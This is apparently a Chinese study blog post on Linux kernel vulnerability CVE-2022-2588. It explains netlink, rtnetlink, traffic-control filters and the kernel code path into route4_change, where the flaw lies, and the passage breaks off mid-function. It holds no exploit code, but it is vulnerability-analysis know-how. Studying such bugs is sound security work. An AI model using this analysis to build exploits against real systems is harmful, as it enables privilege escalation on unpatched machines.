cve-2022-2588学习

感觉好牛，看描述是一个exp可以完成多个版本的通杀，因为在exp中并没有使用某一个特定的内核地址，所以就是说这个exp没有地址依赖，没有地址依赖那就没有内核版本限制了。最主要还是想学习一下这个漏洞利用才想着学习这个cve的，但是一看exp人傻了，七八百行，再加上网上的资料很少。。。彳亍。。。一周半起步了。

前置知识浅学

内核路由表

不只是路由器需要路由表，主机自己也得有路由表，路由表的作用其实就类似于导航的作用，它告诉主机数据包应该转发到哪里。如果主机不含路由表，那么它所有的数据包都传送不出去。所以不关事路由器，主机也会有自己的路由表。

可以通过route -n来查看主机的路由表,下面是我虚拟机的路由表。

内核 IP 路由表
目标            网关            子网掩码        标志  跃点   引用  使用 接口
0.0.0.0         192.168.11.2    0.0.0.0         UG    100    0        0 ens33
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 ens33
172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0
192.168.11.0    0.0.0.0         255.255.255.0   U     100    0        0 ens33

一条路由信息主要包括以下几点。

目的地址
下一跳地址
子网掩码
网卡接口

内核子系统

linux内核主要由以下七个子系统组成，其中最主要的四个子系统是内存管理子系统、进程管理子系统、网络子系统、虚拟文件系统。

各个模块的大概依赖如下

稍微对网络子系统和虚拟文件系统做个了解

网络子系统

Linux网络子系统提供了对各种网络标准的存取和各种硬件的支持。下图是其整体结构。其可以分为协议层和网络驱动程序，其中网络协议主要负责实现每一种可能的网络传输协议，而网络驱动程序负责与硬件通信。

虚拟文件系统

Linux虚拟文件系统（VFS）隐藏了各种硬件的具体细节，为所有的设备提供了统一的接口，它是对各种文件系统的一个抽象，其实使用超级块super block存放文件系统相关信息，使用索引节点inode存放文件的物理信息，使用目录项dentry存放文件的逻辑信息，其整体架构如下。

子系统之间通信

内核的子系统之间是互相依赖的，当某个子系统状态发生改变的时候，就必须使用一定的机制告知使用其服务的其他子系统，以便其他子系统采取相应的措施，但到底如何利用netlink进行子系统之间的通信还是没有查到，只知道各个子系统会对不同的消息会有不同的处理措施。

netlink

内核和用户态进程进行双向通信的一种机制，非常强大，不仅可以支持内核子系统和用户态进程的通信，还可以进行内核中不同子系统之间的通信，但是我在谷歌或者百度中并没有找到相关机制说明和代码演示，只有内核和用户态进程之间通信的代码实践。

创建socket套接字的时候的结构体，和用户态socket的sockaddr_in结构体功能类似。

struct sockaddr_nl
{
    sa_family_t    nl_family;    /*该字段总是为AF_NETLINK    */
    unsigned short    nl_pad;        /* 目前未用到，填充为0*/
    __u32        nl_pid;        /* process pid    */
    __u32        nl_groups;    /* multicast groups mask */
};

其中nl_pid字段比较重要，当有多个用户态进程连接内核时，内核通过这个字段区分不同进程，一般使用getpid()赋值。

netlink消息体如下

消息头结构体如下

struct nlmsghdr
{
    __u32        nlmsg_len;    /* Length of message including header */
    __u16        nlmsg_type;    /* Message content */
    __u16        nlmsg_flags;    /* Additional flags */
    __u32        nlmsg_seq;    /* Sequence number */
    __u32        nlmsg_pid;    /* Sending process PID */
};

用户态和内核态双向通信代码示例

这份代码是基于内核2.x的，不知道如今内核版本是否能用，并未做过实验，仅做记录学习使用。

用户态

#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/socket.h>

#define MAX_PAYLOAD 1024 /*消息最大负载为1024字节*/

int main(int argc, char* argv[])
{
    struct sockaddr_nl dest_addr;
    struct nlmsghdr *nlh = NULL;
    struct iovec iov;
    int sock_fd=-1;
    struct msghdr msg;

    if(-1 == (sock_fd=socket(PF_NETLINK, SOCK_RAW,NETLINK_TEST))){
          perror("can't create netlink socket!");
          return 1;
    }
    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.nl_family = AF_NETLINK;
    dest_addr.nl_pid = 0; /*我们的消息是发给内核的*/
    dest_addr.nl_groups = 0; /*在本示例中不存在使用该值的情况*/

    if(-1 == bind(sock_fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr))){
          perror("can't bind sockfd with sockaddr_nl!");
          return 1;
    }
    if(NULL == (nlh=(struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD)))){
          perror("alloc mem failed!");
          return 1;
    }
    
    memset(nlh,0,MAX_PAYLOAD);
    /* 填充Netlink消息头部 */
    nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
    `nlh->nlmsg_pid = getpid();//我们希望得到内核回应，所以得告诉内核我们ID号`
    nlh->nlmsg_type = NLMSG_NOOP; //指明我们的Netlink是消息负载是一条空消息
    nlh->nlmsg_flags = 0;

    /*设置Netlink的消息内容，来自我们命令行输入的第一个参数*/
    strcpy(NLMSG_DATA(nlh), argv[1]);

    /*这个是模板，暂时不用纠结为什么要这样用。*/
    memset(&iov, 0, sizeof(iov));
    iov.iov_base = (void *)nlh;
    iov.iov_len = nlh->nlmsg_len;
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    sendmsg(sock_fd, &msg, 0); //通过Netlink socket向内核发送消息

    //接收内核消息的消息
    printf("waiting message from kernel!\n");
    memset((char*)NLMSG_DATA(nlh),0,1024);
    recvmsg(sock_fd,&msg,0);
    printf("Got response: %s\n",NLMSG_DATA(nlh));

    /* 关闭netlink套接字 */
    close(sock_fd);
    free(nlh);
    return 0;
}

内核态

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/skbuff.h>
#include <linux/init.h>
#include <linux/ip.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <net/sock.h>
#include <net/netlink.h> /*该文头文件里包含了linux/netlink.h，因为我们要用到net/netlink.h中的某些API函数，nlmsg_put()*/

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Koorey King");

struct sock *nl_sk = NULL;
//向用户空间发送消息的接口
void sendnlmsg(char *message,int dstPID)
{
    struct sk_buff *skb;
    struct nlmsghdr *nlh;
    int len = NLMSG_SPACE(MAX_MSGSIZE);
    int slen = 0;

    if(!message || !nl_sk){
        return;
    }

    // 为新的 sk_buffer申请空间
    skb = alloc_skb(len, GFP_KERNEL);
    if(!skb){
        printk(KERN_ERR "my_net_link: alloc_skb Error./n");
        return;
    }

    slen = strlen(message)+1;

    //用nlmsg_put()来设置netlink消息头部
    nlh = nlmsg_put(skb, 0, 0, 0, MAX_MSGSIZE, 0);

    // 设置Netlink的控制块
    NETLINK_CB(skb).pid = 0; // 消息发送者的id标识，如果是内核发的则置0
    NETLINK_CB(skb).dst_group = 0; //如果目的组为内核或某一进程，该字段也置0

    message[slen] = '\0';
    memcpy(NLMSG_DATA(nlh), message, slen+1);

    //通过netlink_unicast()将消息发送用户空间由dstPID所指定了进程号的进程
    netlink_unicast(nl_sk,skb,dstPID,0);
    printk("send OK!\n");
    return;
}

static void nl_data_ready (struct sock *sk, int len)
{
    struct sk_buff *skb;
    struct nlmsghdr *nlh = NULL;

    while((skb = skb_dequeue(&sk->sk_receive_queue)) != NULL)
    {
        nlh = (struct nlmsghdr *)skb->data;
        printk("%s: received netlink message payload: %s \n", __FUNCTION__, (char*)NLMSG_DATA(nlh));
        sendnlmsg("I see you",nlh->nlmsg_pid); //发送者的进程ID我们已经将其存储在了netlink消息头部里的nlmsg_pid字段里，所以这里可以拿来用。
        kfree_skb(skb);
    }
    printk("recvied finished!\n");
}

static int __init myinit_module()
{
    printk("my netlink in\n");
    nl_sk = netlink_kernel_create(NETLINK_TEST,0,nl_data_ready,THIS_MODULE);
    return 0;
}

static void __exit mycleanup_module()
{
    printk("my netlink out!\n");
    sock_release(nl_sk->sk_socket);
}

module_init(myinit_module);
module_exit(mycleanup_module);

linux流量控制

概念理解

在概念上有了一个大致了解，但不多，在Linux中要实现对数据包接收和发送的这些控制行为，需要使用队列结构来临时保存数据包。在Linux实现中，把这种包括数据结构和算法实现的控制机制抽象为结构队列规程:Queuing discipline，简称为qdisc。qdisc对外暴露两个回调接口enqueue和dequeue分别用于数据包入队和数据包出队，而具体的排队算法实现则在qdisc内部隐藏。不同的qdisc实现在Linux内核中实现为不同的内核模块。

qdisc的实现可以非常简单，比如只包含单个队列，数据包先进先出，如: pfifo, 代码位于net/sched/sch_fifo.c。也可以实现相当复杂的调度逻辑。比如，可以根据数据包的属性进行过滤分类，而针对不同的分类:class采用不同的算法来进行处理。class可以理解为qdisc的载体，它还可以包含子类与qdisc。用来实现过滤逻辑的组件叫做filter，也叫做分类器classfier, 它需要挂载在qdisc或者class上。

基于qdisc, class和filter种三元素可以构建出非常复杂的树形qdisc结构，极大扩展流量控制的能力。

对于树形结构的qdisc, 当数据包流程最顶层qdisc时，会层层向下递归进行调用。如，父对象(qdisc/class)的enqueue回调接口被调用时，其上所挂载的所有filter依次被调用，直到一个filter匹配成功。然后将数据包入队到filter所指向的class，具体实现则是调用class所配置的Qdisc的enqueue函数。没有成功匹配filter的数据包分类到默认的class中。

系统资源控制

每一个进程都有自己的一组资源限制，在(*)inux系统中我们可以通过

1 2	int getrlimit(int resource, struct rlimit rlim); int setrlimit(int resource, const struct rlimit rlim);

resource：可能的选择有

RLIMIT_AS //进程的最大虚内存空间，字节为单位。
RLIMIT_CORE //内核转存文件的最大长度。
RLIMIT_CPU //最大允许的CPU使用时间，秒为单位。当进程达到软限制，内核将给其发送SIGXCPU信号，这一信号的默认行为是终止进程的执行。然而，可以捕捉信号，处理句柄可将控制返回给主程序。如果进程继续耗费CPU时间，核心会以每秒一次的频率给其发送SIGXCPU信号，直到达到硬限制，那时将给进程发送 SIGKILL信号终止其执行。
RLIMIT_DATA //进程数据段的最大值。
RLIMIT_FSIZE //进程可建立的文件的最大长度。如果进程试图超出这一限制时，核心会给其发送SIGXFSZ信号，默认情况下将终止进程的执行。
RLIMIT_LOCKS //进程可建立的锁和租赁的最大值。
RLIMIT_MEMLOCK //进程可锁定在内存中的最大数据量，字节为单位。
RLIMIT_MSGQUEUE //进程可为POSIX消息队列分配的最大字节数。
RLIMIT_NICE //进程可通过setpriority() 或 nice()调用设置的最大完美值。
RLIMIT_NOFILE //指定比进程可打开的最大文件描述词大一的值，超出此值，将会产生EMFILE错误。
RLIMIT_NPROC //用户可拥有的最大进程数。
RLIMIT_RTPRIO //进程可通过sched_setscheduler 和 sched_setparam设置的最大实时优先级。
RLIMIT_SIGPENDING //用户可拥有的最大挂起信号数。
RLIMIT_STACK //最大的进程堆栈，以字节为单位。

这2个API来取得和设置资源
getrlimit用来取得setrlimit用来设置这二个参数都需要一个要控制的资源比如控制CPU、内存、文件描述符个数等等的控制，作为第一个参数传入，第二个参数是一个rlimit的结构体地址（指针），他的结构如下定义：
定义放在头文件/usr/include/bits/resource.h中

struct rlimit
    {
     /* The current (soft) limit.    */
     rlim_t rlim_cur;
     /* The hard limit.    */
     rlim_t rlim_max;
    };

结构体中 rlim_cur是要取得或设置的资源软限制的值，rlim_max是硬限制
这两个值的设置有一个小的约束：
1）任何进程可以将软限制改为小于或等于硬限制
2）任何进程都可以将硬限制降低，但普通用户降低了就无法提高，该值必须等于或大于软限制
3）只有超级用户可以提高硬限制
一个无限的限制由常量RLIM_INFINITY指定（The value RLIM_INFINITY denotes no limit on a resource ）

漏洞模块rtnetlink分析

netlink机制有很多协议，每个协议处理不同的事情，rtnetlink就是netlink的其中一个协议，下面就是netlink协议的一些宏定义。

#define NETLINK_ROUTE        0    /* Routing/device hook                */
#define NETLINK_UNUSED        1    /* Unused number                */
#define NETLINK_USERSOCK    2    /* Reserved for user mode socket protocols     */
#define NETLINK_FIREWALL    3    /* Firewalling hook                */
#define NETLINK_INET_DIAG    4    /* INET socket monitoring            */
#define NETLINK_NFLOG        5    /* netfilter/iptables ULOG */
#define NETLINK_XFRM        6    /* ipsec */
#define NETLINK_SELINUX        7    /* SELinux event notifications */
#define NETLINK_ISCSI        8    /* Open-iSCSI */
#define NETLINK_AUDIT        9    /* auditing */
#define NETLINK_FIB_LOOKUP    10    
#define NETLINK_CONNECTOR    11
#define NETLINK_NETFILTER    12    /* netfilter subsystem */
#define NETLINK_IP6_FW        13
#define NETLINK_DNRTMSG        14    /* DECnet routing messages */
#define NETLINK_KOBJECT_UEVENT    15    /* Kernel messages to userspace */
#define NETLINK_GENERIC        16
/* leave room for NETLINK_DM (DM Events) */
#define NETLINK_SCSITRANSPORT    18    /* SCSI Transports */
#define NETLINK_ECRYPTFS    19
#define NETLINK_TEST    20 /* 用户添加的自定义协议 */

每种协议处理不同的事情，那rtnetlink是干什么的呢，在我的初步了解中，rtnetlink主要可以更改和获取内核的一些网络配置，比如说网络路由、IP地址、链接参数、邻居设置、排队规则、流量类别和数据包分类器都可以通NETLINK_ROUTE套接字进行控制。

rtnetlink主要由以下消息类型组成

RTM_NEWLINK、RTM_DELLINK、RTM_GETLINK创建、删除或获取有关特定网络接口的信息。
RTM_NEWADDR、RTM_DELADDR、RTM_GETADDR添加、删除或接收有关与接口关联的IP地址的信息。
RTM_NEWROUTE、RTM_DELROUTE、RTM_GETROUTE创建、删除或接收有关网络路由的信息。
RTM_NEWNEIGH、RTM_DELNEIGH、RTM_GETNEIGH添加、删除或接收有关邻居表条目的信息（例如，ARP条目）。
RTM_NEWRULE、RTM_DELRULE、RTM_GETRULE添加、删除或检索路由规则。
RTM_NEWQDISC、RTM_DELQDISC、RTM_GETQDISC添加、删除或获取排队规则。
RTM_NEWTCLASS、RTM_DELTCLASS、RTM_GETTCLASS添加、删除或获取流量类别。
RTM_NEWTFILTER, RTM_DELTFILTER, RTM_GETTFILTER添加、删除或接收有关流量过滤器的信息。

rtnetlink相关代码分析

使用NETLINK_ROUTE就可以和rtnetlink进行通信了，rtnetlink有不同的消息类型，不同的消息类型也有不同的type,所以rtnetlink进行初始化的时候就会针对不同情况注册不同的操作函数。

void __init rtnetlink_init(void)
{
	if (register_pernet_subsys(&rtnetlink_net_ops))
		panic("rtnetlink_init: cannot initialize rtnetlink\n");

	register_netdevice_notifier(&rtnetlink_dev_notifier);

	rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
		      rtnl_dump_ifinfo, 0);
	rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

	rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

	rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

	rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

	rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
	rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

	rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
		      0);
	rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

主要就是调用了rtnl_register()函数。

void rtnl_register(int protocol, int msgtype,
		   rtnl_doit_func doit, rtnl_dumpit_func dumpit,
		   unsigned int flags)
{
	int err;

	err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
				     flags);
	if (err)
		pr_err("Unable to register rtnetlink message handler, "
		       "protocol = %d, message type = %d\n", protocol, msgtype);
}

通过rtnl_register()函数声明可见不同消息类型的不同type有两种操作，一种是doit,一种是dumpit。有的类型这两种操作都有，有的类型只有一种。

在rtnl_register()函数中又调用了rtnl_register_internal。

static int rtnl_register_internal(struct module *owner,
				  int protocol, int msgtype,
				  rtnl_doit_func doit, rtnl_dumpit_func dumpit,
				  unsigned int flags)
{
	struct rtnl_link *link, *old;
	struct rtnl_link __rcu **tab;
	int msgindex;
	int ret = -ENOBUFS;

	BUG_ON(protocol < 0 || protocol > RTNL_FAMILY_MAX);
	msgindex = rtm_msgindex(msgtype);

	rtnl_lock();
	tab = rtnl_dereference(rtnl_msg_handlers[protocol]);
	if (tab == NULL) {
		tab = kcalloc(RTM_NR_MSGTYPES, sizeof(void *), GFP_KERNEL);
		if (!tab)
			goto unlock;

		/* ensures we see the 0 stores */
		rcu_assign_pointer(rtnl_msg_handlers[protocol], tab);
	}

	old = rtnl_dereference(tab[msgindex]);
	if (old) {
		link = kmemdup(old, sizeof(*old), GFP_KERNEL);
		if (!link)
			goto unlock;
	} else {
		link = kzalloc(sizeof(*link), GFP_KERNEL);
		if (!link)
			goto unlock;
	}

	WARN_ON(link->owner && link->owner != owner);
	link->owner = owner;

	WARN_ON(doit && link->doit && link->doit != doit);
	if (doit)
		link->doit = doit;
	WARN_ON(dumpit && link->dumpit && link->dumpit != dumpit);
	if (dumpit)
		link->dumpit = dumpit;

	link->flags |= flags;

	/* publish protocol:msgtype */
	rcu_assign_pointer(tab[msgindex], link);
	ret = 0;
	if (old)
		kfree_rcu(old, rcu);
unlock:
	rtnl_unlock();
	return ret;
}

涉及到的结构体如下

struct rtnl_link {
	rtnl_doit_func		doit;
	rtnl_dumpit_func	dumpit;
	struct module		*owner;
	unsigned int		flags;
	struct rcu_head		rcu;
};

有个全局指针数组static struct rtnl_link __rcu *__rcu *rtnl_msg_handlers[RTNL_FAMILY_MAX + 1];，他其实是一个二重指针，第一重指针的下标是消息类型，第二重下标是消息的type,所以每一个消息类型的每一个type都对应一个struct rtnl_link结构体。

除了rtnetlink_init会注册消息的操作之外，tc_filter_init也会注册一些消息的操作,其中RTM_NEWTFILTER这个类型就是添加一个流量过滤器，他只有doit操作，函数为tc_new_tfilter().

static int __init tc_filter_init(void)
{
	int err;

	tc_filter_wq = alloc_ordered_workqueue("tc_filter_workqueue", 0);
	if (!tc_filter_wq)
		return -ENOMEM;

	err = register_pernet_subsys(&tcf_net_ops);
	if (err)
		goto err_register_pernet_subsys;

	rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
		      tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
		      tc_dump_chain, 0);

	return 0;

err_register_pernet_subsys:
	destroy_workqueue(tc_filter_wq);
	return err;
}

现在稍微理清了每个消息类型的每个type如何在内核中组织存储，那该如何调用这些消息的操作函数呢，比如说RTM_NEWTFILTE的doit.

当用户进程通过NETLINK_ROUTE创建套接字并且发送RTM_NEWTFILTER消息用于创建一个流量过滤器时,内核会调用rtnetlink_rcv_msg()函数来处理rtnetlink消息。

struct nlmsghdr *nlh这个结构体在学习netlink的时候就已经见过了,其中family就是消息类型也就是protocol,type就是msgtype，然后调用link = rtnl_get_link(family, type);获得对应的link.获得了link后就调用link->doit()函数，进而调用到了tc_new_tfilter()

static int rtnetlink_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
			     struct netlink_ext_ack *extack)
{
	struct net *net = sock_net(skb->sk);
	struct rtnl_link *link;
	struct module *owner;
	int err = -EOPNOTSUPP;
	rtnl_doit_func doit;
	unsigned int flags;
	int kind;
	int family;
	int type;

	type = nlh->nlmsg_type;
	if (type > RTM_MAX)
		return -EOPNOTSUPP;

	type -= RTM_BASE;

	/* All the messages must have at least 1 byte length */
	if (nlmsg_len(nlh) < sizeof(struct rtgenmsg))
		return 0;

	family = ((struct rtgenmsg *)nlmsg_data(nlh))->rtgen_family;
	kind = type&3;

	if (kind != 2 && !netlink_net_capable(skb, CAP_NET_ADMIN))
		return -EPERM;

	rcu_read_lock();
	if (kind == 2 && nlh->nlmsg_flags&NLM_F_DUMP) {
		struct sock *rtnl;
		rtnl_dumpit_func dumpit;
		u32 min_dump_alloc = 0;

		link = rtnl_get_link(family, type);
		if (!link || !link->dumpit) {
			family = PF_UNSPEC;
			link = rtnl_get_link(family, type);
			if (!link || !link->dumpit)
				goto err_unlock;
		}
		owner = link->owner;
		dumpit = link->dumpit;

		if (type == RTM_GETLINK - RTM_BASE)
			min_dump_alloc = rtnl_calcit(skb, nlh);

		err = 0;
		/* need to do this before rcu_read_unlock() */
		if (!try_module_get(owner))
			err = -EPROTONOSUPPORT;

		rcu_read_unlock();

		rtnl = net->rtnl;
		if (err == 0) {
			struct netlink_dump_control c = {
				.dump		= dumpit,
				.min_dump_alloc	= min_dump_alloc,
				.module		= owner,
			};
			err = netlink_dump_start(rtnl, skb, nlh, &c);
			/* netlink_dump_start() will keep a reference on
			 * module if dump is still in progress.
			 */
			module_put(owner);
		}
		return err;
	}

	link = rtnl_get_link(family, type);
	if (!link || !link->doit) {
		family = PF_UNSPEC;
		link = rtnl_get_link(PF_UNSPEC, type);
		if (!link || !link->doit)
			goto out_unlock;
	}

	owner = link->owner;
	if (!try_module_get(owner)) {
		err = -EPROTONOSUPPORT;
		goto out_unlock;
	}

	flags = link->flags;
	if (flags & RTNL_FLAG_DOIT_UNLOCKED) {
		doit = link->doit;
		rcu_read_unlock();
		if (doit)
			err = doit(skb, nlh, extack);
		module_put(owner);
		return err;
	}
	rcu_read_unlock();

	rtnl_lock();
	link = rtnl_get_link(family, type);
	if (link && link->doit)
		err = link->doit(skb, nlh, extack);
	rtnl_unlock();

	module_put(owner);

	return err;

out_unlock:
	rcu_read_unlock();
	return err;

err_unlock:
	rcu_read_unlock();
	return -EOPNOTSUPP;
}

下面继续分析tc_new_tfilter()函数,这个函数代码较多就不摆出来了，主要看一下关键代码

在看关键代码之前首先要搞清楚一个数据结构

struct nlattr {
	__u16           nla_len;
	__u16           nla_type;
};

这个是netlink一般的数据段格式，图示如下。

一个nlattr+value就相当于一个数据段的字段了。其中length是nlattr+value的总长度。tc_new_tfilter()函数首先初始化了变量struct nlattr *tca[TCA_MAX + 1],他是一个结构体指针数组。数组中的每个指针都指向了一个用户进程传进来的字段的首地址。

获取每一个字段之后，后面就是对字段的解析了，首先是从字段中获取过滤器的名字

if (tcf_proto_check_kind(tca[TCA_KIND], name)) {
		NL_SET_ERR_MSG(extack, "Specified TC filter name too long");
		err = -EINVAL;
		goto errout;
	}

然后是根据chainidx(可控)获取chain,然后根据chain获取一个tp(struct tcf_proto),

tp = tcf_chain_tp_find(chain, &chain_info, protocol,
			       prio, prio_allocate);
	if (IS_ERR(tp)) {
		NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
		err = PTR_ERR(tp);
		goto errout_locked;
	}

如果tp不存在还会根据过滤器名称name调用tcf_proto_create(创建一个新的tp

tp_new = tcf_proto_create(name, protocol, prio, chain,
					  rtnl_held, extack);
		if (IS_ERR(tp_new)) {
			err = PTR_ERR(tp_new);
			goto errout_tp;
		}

static struct tcf_proto *tcf_proto_create(const char *kind, u32 protocol,
					  u32 prio, struct tcf_chain *chain,
					  bool rtnl_held,
					  struct netlink_ext_ack *extack)
{
	struct tcf_proto *tp;
	int err;

	tp = kzalloc(sizeof(*tp), GFP_KERNEL);
	if (!tp)
		return ERR_PTR(-ENOBUFS);

	tp->ops = tcf_proto_lookup_ops(kind, rtnl_held, extack);
	if (IS_ERR(tp->ops)) {
		err = PTR_ERR(tp->ops);
		goto errout;
	}
	tp->classify = tp->ops->classify;
	tp->protocol = protocol;
	tp->prio = prio;
	tp->chain = chain;
	spin_lock_init(&tp->lock);
	refcount_set(&tp->refcnt, 1);

	err = tp->ops->init(tp);
	if (err) {
		module_put(tp->ops->owner);
		goto errout;
	}
	return tp;

errout:
	kfree(tp);
	return ERR_PTR(err);
}

在tcf_proto_create()中会根据name即kind调用函数tcf_proto_lookup_ops()获得对应的ops,内核本来就有一些ops，查找对应ops的原理就是对比kind==ops->kind，如果等于那就返回这个ops的首地址。

比如如果传入的kind="route"就会返回这样的ops

static struct tcf_proto_ops cls_route4_ops __read_mostly = {
	.kind		=	"route",
	.classify	=	route4_classify,
	.init		=	route4_init,
	.destroy	=	route4_destroy,
	.get		=	route4_get,
	.change		=	route4_change,
	.delete		=	route4_delete,
	.walk		=	route4_walk,
	.dump		=	route4_dump,
	.bind_class	=	route4_bind_class,
	.owner		=	THIS_MODULE,
};

然后初始化tp的一些字段。

最后调用tp->ops->init即route4_init函数，这个函数创建了一个rout4_head结构体用于存放过滤器对应的哈希值

static int route4_init(struct tcf_proto *tp)
{
	struct route4_head *head;

	head = kzalloc(sizeof(struct route4_head), GFP_KERNEL);
	if (head == NULL)
		return -ENOBUFS;

	rcu_assign_pointer(tp->root, head);
	return 0;
}

struct route4_head {
	struct route4_fastmap		fastmap[16];
	struct route4_bucket __rcu	*table[256 + 1];
	struct rcu_head			rcu;
};

然后返回到tc_new_tfilter函数中，把新创建并且初始化的tp插入到chain中

tp = tcf_chain_tp_insert_unique(chain, tp_new, protocol, prio,
						rtnl_held);
		if (IS_ERR(tp)) {
			err = PTR_ERR(tp);
			goto errout_tp;
		}
	} else {
		mutex_unlock(&chain->filter_chain_lock);
	}

然后调用tp->ops->get即route4_get()

根据handle从route4_head链表中获取对应的route4_filter。如果为空且n->nlmsg_flags & NLM_F_CREATE)存在或者不为空但n->nlmsg_flags & NLM_F_CREATE)不存在则调用tp->ops->change即rout4_change创建

err = tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh,
			      flags, extack);
	if (err == 0) {
		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
			       RTM_NEWTFILTER, false, rtnl_held);
		tfilter_put(tp, fh);
		/* q pointer is NULL for shared blocks */
		if (q)
			q->flags &= ~TCQ_F_CAN_BYPASS;
	}

而rout4_change()就是漏洞产生的模块。

硬着头皮看了半个晚上的代码终于大概搞懂了相关的结构体的关系以及漏洞原因。

首先是有一个结构体chain,这个结构体记录了一个tp的链表，然后tc_new_tfilter()函数根据用户传进来的一些参数确定一个tp如果找不到这个tp那就创建一个新的tp，关键的是还会创建一个新的route4_head,记录在这个新tp的字段里，这个route4_head就是一个哈希桶，主要记录route4_filter结构体，route4_head结构体如下

struct route4_head {
	struct route4_fastmap		fastmap[16];
	struct route4_bucket __rcu	*table[256 + 1];
	struct rcu_head			rcu;
};
struct route4_bucket {
	/* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
	struct route4_filter __rcu	*ht[16 + 16 + 1];
	struct rcu_head			rcu;
};

struct route4_filter {
	struct route4_filter __rcu	*next;
	u32			id;
	int			iif;

	struct tcf_result	res;
	struct tcf_exts		exts;
	u32			handle;
	struct route4_bucket	*bkt;
	struct tcf_proto	*tp;
	struct rcu_work		rwork;
};

可以清晰的看见就是一个哈希桶，tp->ops->get()是会根据用户传入的handle找对应route4_filter，找到的话返回，没找到返回null。

接着调用tp->ops->change()函数，把get()函数找到的旧的过滤器也传入,change首先是会把新的过滤器插入到哈希桶即route4_head中，接着判断旧的过滤器fold是否存在，如果存在的话先把她从哈希桶中移出来，然后把他kfree掉。

static int route4_change(struct net *net, struct sk_buff *in_skb,
			 struct tcf_proto *tp, unsigned long base, u32 handle,
			 struct nlattr **tca, void **arg, u32 flags,
			 struct netlink_ext_ack *extack)
{
	struct route4_head *head = rtnl_dereference(tp->root);
	struct route4_filter __rcu **fp;
	struct route4_filter *fold, *f1, *pfp, *f = NULL;
	struct route4_bucket *b;
	struct nlattr *opt = tca[TCA_OPTIONS];
	struct nlattr *tb[TCA_ROUTE4_MAX + 1];
	unsigned int h, th;
	int err;
	bool new = true;

	if (opt == NULL)
		return handle ? -EINVAL : 0;

	err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
					  route4_policy, NULL);
	if (err < 0)
		return err;

	fold = *arg;
	if (fold && handle && fold->handle != handle)
			return -EINVAL;

	err = -ENOBUFS;
	f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
	if (!f)
		goto errout;

	err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE);
	if (err < 0)
		goto errout;

	if (fold) {
		f->id = fold->id;
		f->iif = fold->iif;
		f->res = fold->res;
		f->handle = fold->handle;

		f->tp = fold->tp;
		f->bkt = fold->bkt;
		new = false;
	}

	err = route4_set_parms(net, tp, base, f, handle, head, tb,
			       tca[TCA_RATE], new, flags, extack);
	if (err < 0)
		goto errout;

	h = from_hash(f->handle >> 16);
	fp = &f->bkt->ht[h];
	for (pfp = rtnl_dereference(*fp);
	     (f1 = rtnl_dereference(*fp)) != NULL;
	     fp = &f1->next)
		if (f->handle < f1->handle)
			break;

	tcf_block_netif_keep_dst(tp->chain->block);
	rcu_assign_pointer(f->next, f1);
	rcu_assign_pointer(*fp, f);

	if (fold && fold->handle && f->handle != fold->handle) {
		th = to_hash(fold->handle);
		h = from_hash(fold->handle >> 16);
		b = rtnl_dereference(head->table[th]);
		if (b) {
			fp = &b->ht[h];
